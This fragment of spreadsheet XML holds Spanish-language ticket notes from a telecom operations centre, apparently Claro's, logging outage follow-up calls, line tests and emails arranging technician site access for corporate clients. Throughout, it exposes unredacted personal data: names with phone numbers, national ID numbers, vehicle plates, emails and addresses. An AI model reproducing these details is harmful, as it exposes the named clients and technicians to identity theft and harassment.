    <t>VPERALTA@GENESISEMPRESARIAL.COM	   SE ENVIA CORREO A CLIENTE</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR PERALTA 46153837 MENCIONA QUE ESTARA RESPONDIENDO EL CORREO CON LOS PERMISOS AUTORIZADOS
-ID 2001090237 - 2001090499</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE ALBERTO BRITO 30372959 ID: 2001063915 /
CL COMENTA QUE AUN PERSISTE EL PROBLEMA, ENERGIA EN SITIO OK, SE DEJA EN CONFERENCIA CON RAMOS.MARLON PARA PRUEBAS ¿PENDIENTES | WIP</t>
  </si>
  <si>
    <t>F4576646</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE NORMA TORRES 76083866 INDICA QUE ESTA REALIZANDO PRUEBAS DE LLAMADAS Y SOLICITA QUE SE LE CONTACTE EN 1 HORA</t>
  </si>
  <si>
    <t>SE LLAM A CLIENTE NORMA TORRES 76083866  PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001135967 - 2001136487</t>
  </si>
  <si>
    <t>F4576664</t>
  </si>
  <si>
    <t>SE LE INDICA A CLIENTE QUE NO SE TIENE EQUIPOS DE RED LAN ASOCIANDOSE AL ROUTER, SE SUGIERE ESCALARLO CON EL AREA DE INFORMATICA PARA REVISION DE SUS EQUIPOS, CL INDICA QUE ESCALARA Y AL TENER ALGUN AVANCE O CONSULTAS ESTARA DEVUELVIENDO LLAMADA--</t>
  </si>
  <si>
    <t>SE LE LLAMA A ALLAN LOPEZ 53178217 ID: 2001060151 /
CL COMENTA QUE PROBLEMA PERSISTE, SE DEJA EN CONFERENCIA CON YENSI CALGUA PARA PRUEBAS PENDIENTES | WIP</t>
  </si>
  <si>
    <t>F4576673</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EVELIN MONROY 54602315 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001079982</t>
  </si>
  <si>
    <t>F4576675</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CRONO ANTERIOR INDICA ENLACE EN MONITOREO PARA LAS 12:00PM A SOLICITUD DE CLIENTE</t>
  </si>
  <si>
    <t>F4576679</t>
  </si>
  <si>
    <t>*** SE ENVÍAN DATOS DE PERSONAL TÉCNICO A CLIENTE. A LA ESPERA DE AUTORIZACIÓN DE ACCESOS ***
DE: ANGEL DANIEL TORRES AJTUN
ENVIADO: MIÉRCOLES, 25 DE MAYO DE 2022 10:37
PARA: OLVIN.RODRIGUEZ@FARSIMAN.COM &lt;OLVIN.RODRIGUEZ@FARSIMAN.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;
ASUNTO: SUPER FARMACIA SIMAN - 908689OH - SIMAN JUTICALPA 3
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DE LA FALLA, FAVOR DE SU APOYO CON LA GESTIÓN DE PERMISOS PARA EL PERSONAL TÉCNICO EN MENCIÓN. ELLO PARA LA VERIFICACIÓN DEL SERVICIO:
DANIEL EDGARDO ZELAYA CRUZ
0801-1976-13407
ELVIN JOSUE RODRÍGUEZ DURON
0801-1998-08494
FRANKLIN ALEJANDRO MEZA RODRIGUEZ
1801-1996-06969
NUSLY GABRIELA MONTES CERNA
1501-1998-00272
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4576684</t>
  </si>
  <si>
    <t>SE LE LLAMA A HAIRO VELASQUEZ 46051665 ID: 2001072144
COMENTA QUE EL SERVICIO ESTA OK, AUTORIZA CIERRE DE INCIDENTE, SE TERMINARA DE VALIDAR MEDIANTE SD
SE NOTIFICA A LUVY.SANDOVAL VIA SKYPE | WIP</t>
  </si>
  <si>
    <t>F4576685</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN CARLOS ROBLES 58794781 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001061573</t>
  </si>
  <si>
    <t>F4576695</t>
  </si>
  <si>
    <t>SE LLAMA A ERICK MONTEJO 58064113 / 46990218 ID: 2001075438 / 2001075539
CONFIRMA SERVICIO OK, AUTORIZA CIERRE DE DE INCIDENTE, SE TERMINARA DE VALIDAR MEDIANTE SD
SE NOTIFICA A RAMOS.MARLON VIA SKYPE  WIP</t>
  </si>
  <si>
    <t>F4576700</t>
  </si>
  <si>
    <t>SE LLAMA A CINDY PARA VALIDAR PERO NO RESPONDE---</t>
  </si>
  <si>
    <t>SE VALIDA NUEVAMENTE CON CLIENTE Y COMENTA QUE OBSERVA EL SERVICIO NORMALIZADO, SE VALIDA ALGUNOS DROPS SOBRE LA INTERFAZ, SE PASA CONFIG A VLAN --- CLIENTE SOLICITA SEGUNDA LLAMADA A LAS 13:00 HORAS--</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CINDY ARTEAGA AL 25272400 INDICA QUE ESTA DEMASIADO LENTO EL SERVICIO || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 2001086666
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CINDY ARTEAGA 25272400 MENCIONA QUE YA TODO ESTA FUNCIONANDO DE MANERA CORRECTA
-ID 2001153838</t>
  </si>
  <si>
    <t>F4576703</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ARON MONTERROSO 54743712  MENCIONA QUE ESTARA REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMADA PRA LAS 14:00
-ID 2001097272</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ARON MONTERROSO 54743712 CLIENTE INDICA QUE YA HABLO CON GESTOR **
ID 2001171370
**</t>
  </si>
  <si>
    <t>F4576704</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CLIENTE ERNESTO RUBIO  AL 25562049 SOLICITA QUE SE LE ENVIE UNA GRAFICA DE DISPONIBILIDAD DE UNA VENTANA DE AYER DESDE LAS 23:00 HRS HASTA HOY A LAS 2:00 AM || SE NOTIFICA A GESTOR **
ID 2001116188
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERNESTO RUBIO  AL 25562049 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001090307
**</t>
  </si>
  <si>
    <t>F4576709</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERNESTO RUBIO AL 77979726 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001090885
**</t>
  </si>
  <si>
    <t>F4576712</t>
  </si>
  <si>
    <t>SE LE LLAMA A VICTOR  RIOS 58064113  ID: 2001077512 /
CONFIRMA SERVICIO OK, AUTORIZA CIERRE DE INCIDENTE, SE TERMINARA DE VALIDAR MEDIANTE SD
SE NOTIFICA A WAGNER.POLANCO VIA SKYPE | WIP</t>
  </si>
  <si>
    <t>F4576721</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL  MENCIONA QUE YA OBSERVA EL SERVICIO OPERATIVO
-ID 2001117129</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS NAVARRO  51552078 ENVIA DIRECTO A BUZON, SE INTENTARA LUEGO
-ID 2001080796 - 2001081544</t>
  </si>
  <si>
    <t>F4576730</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001117129</t>
  </si>
  <si>
    <t>F4576731</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  LUIS SEQUEN 53756472  QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001361722</t>
  </si>
  <si>
    <t>SE VALIDAN PRUEBAS DE PRIMER NIVEL CON CLIENTE
2001073007
COLA:
NOMBRE: A: 30028317
NÚMERO: 30028317
DURACIÓN: 0:03:03
ESTADO: CONECTADA
DETALLES: 30028317
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 25/05/2022 09:30:02</t>
  </si>
  <si>
    <t>F4576732</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA LOS PERMISOS DE PERSONAL TECNICO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 25 DE MAYO DE 2022 10:25
PARA: KSOLISCH@BACCREDOMATIC.CR &lt;KSOLISCH@BACCREDOMATIC.CR&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;
ASUNTO: GESTION DE PERMISOS || BANCO BAC SAN JOSE S.A || CONTR0002142555OC || F4576732
BUEN DÍA
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO
A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
NOMBRE                         CED.                            PLACA
DAVID NAVARRO.         1-1193-0872            FNQ001
FREDDY CHENG            1-1227-0397            CHN117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REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 25 DE MAYO DE 2022 11:14
PARA: KSOLISCH@BACCREDOMATIC.CR &lt;KSOLISCH@BACCREDOMATIC.CR&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;
ASUNTO: RE: GESTION DE PERMISOS || BANCO BAC SAN JOSE S.A || CONTR0002142555OC || F4576732
BUEN DÍA
   EN SEGUIMIENTO AL TICKET SD1128911 SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
LUIS MARIANO VARGAS SOTO ID: 111340677
GOEVANY MAZANARES GOMEZ ID: C01722710.
YADER ANTONIO ALARCON MAZANARES ID: 402550851
BAYAIDO BALLADARES MEJIA ID:155833036213
DIEGO ARMANDO CASTRO FERNANDEZ ID:304160996
WILLIAM MEJIA CHAVARRIA ID: 155829495508
FABIAN VASQUEZ CAMPOS ID:2054600212
EDGARDO MURILLO MEJIA ID:503610837
PEDRO ARCE BOLAÑOS ID: 206740836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76741</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  CARLOS GARCIA - 42585228 NO RESPONDE, ENVIA DIRECTO A BUZON SE INTENTARA LUEGO **
ID 2001091877
**</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE CARLOS GARCIA 42585228
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  CARLOS GARCIA - 42585228 NO RESPONDE, ENVIA DIRECTO A BUZON SE INTENTARA LUEGO **
ID 2001100881
**</t>
  </si>
  <si>
    <t>LLAMADAS AL GDN INGRESAN LA LLAMADA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS GARCIA 42585228 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO **
ID 2001085721
**</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA. SE VERIFICA QUE EL SERVICIO CONTINUA ACTIVO.
2001234226
COLA:
NOMBRE: A: 23880700
NÚMERO: 23880700
DURACIÓN: 0:00:29
ESTADO: MARCANDO
DETALLES: 23880700
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 25/05/2022 17:32:37</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS GARCIA 42585228 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001231650 - 2001231834</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS GARCIA 42585228 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001240914</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE CON EL DATO DEL PERSONAL TECNICO
F4576741 / EURONATURA S.A / GDN 23880700 / 5 AVENIDA A 16-62 ZONA 10 EDIF. PLATINA OF.401
MONICA YIREH CASTILLO POON
BUENAS TARDES ESTIMADO,
SOLICITANDO DE SU AMABLE APOYO CON TRAMITAR LOS PERMISOS NECESARIOS PARA REVISAR DENTRO DE LAS INSTALACIONES, SE ADJUNTA DATOS DEL PERSONAL TÉCNICO.
NOMBRE	DPI
JOSÉ ALBERTO IXPATA TOJ	1660 02313 1503
ERWIN EDUARDO DEL CID DUBON	1981 48798 0101
SALUDOS,</t>
  </si>
  <si>
    <t>TENGO A ERWIN EN LINEA Y A JAVIER CHETE, SE  BORRO CONTADORES PERO CON LA PBX CONECTADA ESTA GENERANDO ERRORES Y SE ESTA ALARMANDO CON PMA, . PERSONAL CONECTANDO VEEX PARA REALIZAR PRUEBAS
2001149591
COLA: CNOC_ACCESO_EMPRESARIAL
NOMBRE: DE: 58262225
NÚMERO: 58262225
DURACIÓN: 0:17:50
ESTADO: ACD - ASIGNADO A: MARIAI.GODINEZ
DETALLES: 58262225
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 25/05/2022 13:11:39</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE CARLOS GARCIA 42585228 PARA VALIDAR CUAL ES EL PROCEDIMIENTO PARA DAR PERMISOS AL PERSONAL TECNICO PERO TAMPOCO NOS RESPONDE, SE ENVIARA INFORMACION DE LOS TECNICOS VIA CORREO##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE HABLO CON RECEPCION PERLA QUIEN INDICA QUE ESTA REALIZANDO PRUEBAS.</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE CARLOS GARCIA 42585228 PARA INFORMAR ACERCA DE LAS PRUEBAS Y EL ESTADO DEL SERVICIO EN ESTE MOMENTO PERO NO SE TIENE RESPUESTA.
SE MONITOREO  LTG Y SE OBSERVA QUE TIENE ERRORES EN EL SERVICIO
##LLAMADA DESDE VIVO
PCM ALARM COUNTERS             LTG =   4-42  PDCLNK =  3    MASKNO:02212
TIME COUNTER   12-50MS   50-100MS   100-2000MS   &gt;2000MS
-------------+---------+----------+------------+--------
AIS                  0          0            4        10
SYN                  1          0            0         0
SSYN                 0          0            0         0
D-BIT               14          4           86        25
SD-BIT               0          0            0         0
SN-BIT               0          0            0         0
INC LOSS             0          0            0         0
AIS MULT             0          0            0         0
                                                            MASKNO:02213
ERROR COUNTER       &lt;10    10-32    33-36      &gt;36
----------------+--------+--------+--------+------
ERCO                221        3        1        9
CODE VIOLATION  SECONDS  MINUTES
---------------+--------+-------
HDB3 -5               0        0
HDB3 -3               0        0
CALLP          BLOCKING  RELEASE
--------------+---------+-------
CAPCTL               78       18
COUNTER            COUNTER VALUE
-----------------+--------------
SLIP                           0
END JOB 6322</t>
  </si>
  <si>
    <t>F4576753</t>
  </si>
  <si>
    <t>F4576756</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EVELYN SALAZAR AL 76769577 INDICA QUE CONTINUA CON EL INCONVENIENTE ||
SE NOTIFICA A GESTOR**
ID 2001093060
**</t>
  </si>
  <si>
    <t>F4576761</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE PARTE DEL CLIENTE ETEL ROLDAN ID: 2001110024
SE LE BRINDA INFORMACION, DE RED SATURADA, COMENTA QUE LO ESTARA VIENDO CON SU IT
SOLICITA SE LE ENVIE CORREO EROLDAN@REGISTREK.COM, SE LE ENVIA CORREO Y AUTORIZA EL CIERRE DE TKT, SE NOTIFICA A DARWINH.ESPANA VIA SKYPE | WIP
DE: CLIENTESCORPORATIVOS
ENVIADO EL: MIÉRCOLES, 25 DE MAYO DE 2022 11:28
PARA: EROLDAN@REGISTREK.COM
CC: CLIENTESCORPORATIVOS
ASUNTO: SEGUIMIENTO DE TICKET SD1128922 | 885200001T | ASUNTOS REGULATORIOS REGISTREK, S.A.
BUENOS DÍAS ESTIMADA SRITA ETHEL
            CONTINUANDO CON EL SEGUIMIENTO DEL TICKET SD1128922 Y SEGÚN LO CONVERSADO ANTERIORMENTE VÍA TELEFÓNICA, LE COMPARTO LA GRÁFICA DE CONSUMO DE SU SERVICIO DONDE SE EVIDENCIA SATURACIÓN SOBRE SU RED.
POR LO ANTERIOR Y COMO LO CONVERSAMOS, PROCEDEMOS CON EL CIERRE DE NUESTRO TICKET SIEMPRE QUEDANDO A LA ORDEN ANTE CUALQUIER INCONVENIENTE.
QUEDO ATENTO A SUS COMENTARIOS, SALUDOS CORDIALES.
ATENTAMENTE:</t>
  </si>
  <si>
    <t>F4576763</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
364100048T || COLUMBUS NETWORKS DE GUATEMALA LTDA.
AXEL SAMUEL LOPEZ ORTIZ
BUENOS DÍAS ESTIMADO SR. PALACIOS.
BRINDANDO SEGUIMIENTO AL INCIDENTE REPORTADO CON EL ID 364100048T, ADJUNTO LOS DATOS DEL PERSONAL QUE SE HARÁ PRESENTE A SUS INSTALACIONES:
NOMBRE                                                                    DPI
LUIS PEÑALONZO JUAN HUMBERTO        1985-31060-1201
JUAREZ GONZALEZ BILLY DAVID                1594-14512-1202
ATENTAMENTE:</t>
  </si>
  <si>
    <t>ACTUALMENTE EN LLAMADA CON CLIENTE SR. JOSE PALACIOS, INFORMA QUE TIENE AL TECNICO LESTER GONZALES EN SITIO, SE NECESITA REALIZAR PRUEBAS EN CONJUNTO CON PERSONAL TECNICO DE CLARO, YA QUE DESCARTARON PROBLEMAS EN SU EQUIPO CISCO ...</t>
  </si>
  <si>
    <t>F4576764</t>
  </si>
  <si>
    <t>ENLACE CONTINUA CAIDO || SE ENVIA CORREO A CLIENTE PARA DESCARTAR TEMAS DE ENERGIA EN PUNTO REMOTO.
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: MIÉRCOLES, 25 DE MAYO DE 2022 19:35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TS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6764
ID: IP2030036SV
IDENTIFICADOR DEL CLIENTE:  CC_BANCO_AGRICOLA_SV_ATM_TSE
UBICADO EN:  SAN SALVADOR              COL. ESCALON              13A. CALLE PONIENTE       4224                      TRIBUNAL SUPREMO ELECTORAL
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4576766</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARÍA FERNANDA MONZÓN 50386321 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001096448
**</t>
  </si>
  <si>
    <t>F4576768</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MENCIONA QUE EL SERVICIO LO OBSERVA OPERATIVO
CLIENTE INDICA QUE SE PUEDE CERRAR EL TICKET
-ID 3001550070</t>
  </si>
  <si>
    <t>F4576769</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILFREDO GABRIEL 58319640 SE CONTACTA A CLIENTE Y SE DEJA EN LINEA CON GESTOR **
ID 2001097660
**</t>
  </si>
  <si>
    <t>F4576770</t>
  </si>
  <si>
    <t xml:space="preserve"> **SE LLAMA A CLIENTE FRANCISCO ARDON AL 76827212 - 77301902 NO RESPONDE EN EL PRIMER NUMERO Y EL SEGUNDO NUMERO INDICA QUE TIENE CORTE DE FIBRA YA QUE DONDE PASA LA FIBRA HUBO UN PEQUEÑO INCENDIO AGARRO FUEGO Y CORTO LA FIBRA SE SOLICITAN DATOS DE VISITA**
HORARIO DE ATENCION: 700 AM A 18:00 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCION: BULEVAR COSTA DEL SOL SAN LUIS LA HERRADURA CARRETERA KM 75 1/2 REFERENCIA 400 MTS DESPUES DEL HOTEL PACIFIC PARADISE A MANO IZQUIERDA .
ATENDERA EN SITIO:  FRANCISCO ARDON
ID 2001149564
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO ARDON 76827212 - 77301902 NO REPSONDE, SE INTENTARA LUEGO
-ID 2001088279 - 2001088438 - 2001089128</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCISCO ARDON 76827212 - 77301902 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001125941 - 2001126047
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO ARDON 76827212 - 77301902 NO RESPONDE
-ID 2001100872 - 2001101043</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCISCO ARDON AL 76827212 Y 77301902 NO RESPONDE , SE INTENTARA LUEGO **
ID 2001220855 - 2001221197
**</t>
  </si>
  <si>
    <t>F4576788</t>
  </si>
  <si>
    <t>SE HACE RECORDATORIO A GESTIÓN N1 VÍA SKYPE DE LO DICHO EN CRONO ANTERIOR, EN ESPERA DE APOYO DE ÉSTOS.</t>
  </si>
  <si>
    <t>F4576789</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MERARY OSORIO 76040667 MENCIONA QUE EN PR ES MUY CONSTANTE LOS APAGONES DE ENERGIA, SE LE MENCIONA QUE ES NECESARIO QUE LOS EQUIPOS ESTEN PROTEGIDOS
CLIENTE REPORTA INTERMITENCIA, SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001102305</t>
  </si>
  <si>
    <t>F4576796</t>
  </si>
  <si>
    <t>SE TIENE RESPUESTA DEL CLIENTE, DONDE INDICA QUE SE TIENE PROBLEMA DE ENERGIA EN ELPR, SE MANTENDRA EN ETAPA PC, PARA QUE SE VALIDA CUANDO RESTABLEZCA.</t>
  </si>
  <si>
    <t>F4576813</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DANIEL CORENA 77451536 QUIEN SOLICITA SE PUEDA BLOQUEAR LA IP 190.86.184.1  YA QUE ESTA PRESENTANDO INTENTOS DE CONEXION DESDE ESA IP
-ID 2001108408</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DANIEL CORENA 77451536 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001402163</t>
  </si>
  <si>
    <t>**SE LLAMA CLIENTE DANIEL CORENA AL  77451536 CONFIRMA SERVICIO ESTABLE POR EL MOMENTO SOLICITA QUE SE LE LLAME A LAS 14:00 HRS PARA CONFIRMAR NUEVAMENTE YA QUE A ESA HORA HARA OTRA PRUEBA **
ID 2001315731
**</t>
  </si>
  <si>
    <t>F4576828</t>
  </si>
  <si>
    <t>SE IGUAL MANERA SE MANDA CORREO AL CLIENTE PARA GESTIONAR PERMISOS
+DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: MIÉRCOLES, 25 DE MAYO DE 2022 12:48
PARA: MARIO.VASQUEZ@RED-TECNOLOGICA.COM &lt;MARIO.VASQUEZ@RED-TECNOLOGICA.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | 1086827OH| OH1000667697/RED TECNOLOGICA - | CENTRO COMERCIAL NOVACENTRO, PRIMER NIVEL , FRENTE A REPOSTERIA BASILOS ,TEGUCIGALPA COOPERATICA CECEINTOL
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO 1086827OH| OH1000667697/RED TECNOLOGICA - |  CENTRO COMERCIAL NOVACENTRO, PRIMER NIVEL , FRENTE A REPOSTERIA BASILOS ,TEGUCIGALPA COOPERATICA CECEINTOL
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO. INDICANDO EL DÍA Y HORA DE VISITA.
TECNICOS:
RSONAL DE CLAR
PERSONAL EXTERNO
EMPRESA
NOMBRE
ID
N° DE TELÉFONO EN SITIO
GEORED
CESAR ALEJANDRO FLORES AMAYA
0826-1991-00164
GEORED
JULIO CESAR MENDOZA HERNANDEZ
0801-1987-19060
GEORED
JOSE LUIS VARELA RUBI
0801-1993-08148
GEORED
RUBÉN ALFREDO VELÁSQUEZ MADARIAGA
0801-1990-16905
QUEDAMOS ATENTOS A SUS COMENTARIOS,
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4576831</t>
  </si>
  <si>
    <t>NO HAY INFORMACIÓN DE LA RAZÓN DE EL ESTADO DE LA FALLA, POR TAL RAZÓN SE PASA A WIP, COMPAÑEROS FAVOR INDICAR QUE ES LO PENDIENTES CON EL CLIENTE PARA EL APOYO A CONTACTARLO Y DAR EL SEGUIMIENTO Y NO AFECTARLOS EN CAMBIAR EL ESTADO. SE NOTIFICA VÍA SKYPE AL GESTOR ALEJANDRO.NAVARRO POR EL CAMBIO Y BRINDAR EL SEGUIMIENTO.</t>
  </si>
  <si>
    <t>F4576838</t>
  </si>
  <si>
    <t>SE LE LLAMA A EDWIN MANZO 46261534  ID: 2001107951 / 2001107529,
SE DEJA EN CONFERENCIA CON MIGUELAN.RODRIGUEZ PARA PRUEBAS | WIP</t>
  </si>
  <si>
    <t>VALIDA: SR. EDWIN MANZO INFORMA QUE SUS EQUIPOS SI ESTAN CONECTADOS A UPS, CONFIRMA ENLACE OPERATIVO Y ESTABLE.</t>
  </si>
  <si>
    <t>F4576866</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DIEGO DIAZ 41259498  PARA SOLICITAR DATOS DE VISITA TECNICA
-ID 2001114414 - 2001114785
NOMBRE DEL CLIENTE: BANCO G&amp;T CONTINENTAL
UBICACIÓN:3 CALLE 10-29 ZONA 1 ZACAPA
CONTACTO EN SITIO: NORVIN NOE RAMIREZ - 42611260
HORARIO DE ATENCION: 9:00 - 19:00
GESTIÓN DE PERMISOS:DATOS DE PERSONAL TECNICO -- DIDIAZ@GTC.COM.GT</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DIEGO DIAZ AL 41259498  INDICA QUE ESTARA SOLICITANDO ACCESOS Y CUANDO LOS TENGA ESTARA RESPONDIENDONOS POR CORREO **
ID 2001164889
**</t>
  </si>
  <si>
    <t>F4576872</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 26 DE MAYO DE 2022 11:50
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; EMERSON ALEXANDER TORRES MARTINEZ &lt;EMERSON.TORRES@FICOHSA.COM&gt;; CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;
CC: JOSE ANTONIO FERNANDEZ CABRERA &lt;JANTONIO.FERNANDEZ@CLARO.COM.GT&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; JAIME OSCAR MOLINA ORDONEZ &lt;JAIME.MOLINA@FICOHSA.COM&gt;; DARWIN ENRIQUE MOTIÑO RAMOS &lt;DARWIN.MOTINO@FICOHSA.COM&gt;
ASUNTO: RE: NUEVO DISPOSITIVO ENLACE CLARO FICOHSA - SM LA COLONIA MEGAMALL F4576872 // CLARO HONDURAS // CSC3945_MEGAMALL_SAN46-SAN14
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>CLIENTE NO VALIDA ACCESO QUEDA A ESPERA PARA ENVIAR PERSONAL TECNICO</t>
  </si>
  <si>
    <t>PROCEDER CON VISITA TECNICA, SE LLAMARA A CLIENTE PARA INDICAR QUE PERSONAL ESTARA A CARGO Y CUNATO TIEMPO LLEVARA SU TRASLADO</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE  EMERSON A. TORRES (504) 2239-6410 EXT. 4190 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001567496
**</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SOLICITANDO VISITA EN CONJUNTO CON PERSONAL DE SOPORTE DE MEGAMALL AL DATACENTER
DE: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 26 DE MAYO DE 2022 20:33
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; EMERSON ALEXANDER TORRES MARTINEZ &lt;EMERSON.TORRES@FICOHSA.COM&gt;
